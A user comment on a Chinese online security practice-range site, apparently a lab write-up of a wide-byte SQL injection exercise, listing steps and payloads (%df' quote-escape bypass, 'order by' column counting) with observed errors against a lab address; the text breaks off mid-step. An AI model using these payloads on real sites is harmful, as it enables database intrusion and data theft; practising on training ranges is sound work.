首页
在线靶场
搜索
登录
注册
qwsn
330
能力值
6
靶场
完成靶场
评论信息
评论信息
SQL注入漏洞测试(宽字节)
6.漏洞利用: 第一步:探测注入点【登录框下的灰色滚动公告超链接】 浏览器访问靶场,发现登录框下面有灰色滚动公告,该公告是一个超链接,点击跳转到注入点:http://219.153.49.228:43424/new_list.php?id=1(或者查看页面源码,也可以发现,御剑扫不到) 第二步:使用单引号报错的方式,验证注入点,判断注入点类型 ?id=1' //并没有报错,推测'被转义 ?id=1%df' //报错成功:' '1�'' ' ?id=1%ef' //报错成功:' '1�'' ' ?id=1%e0' //报错成功:' '1�'' ' 第三步:使用order by,猜解前置查询的字段数【5】 ?id=1%df' order by 10--+ //回显:Unknown column '10' in 'order clause' ?id=1%df' order by 5 --+ //正常回显 ?id=1%df' order
2020-07-04 00:16:10
赞 ( 1 )
返回顶部
常见问题
商务合作
关注微博
关注微信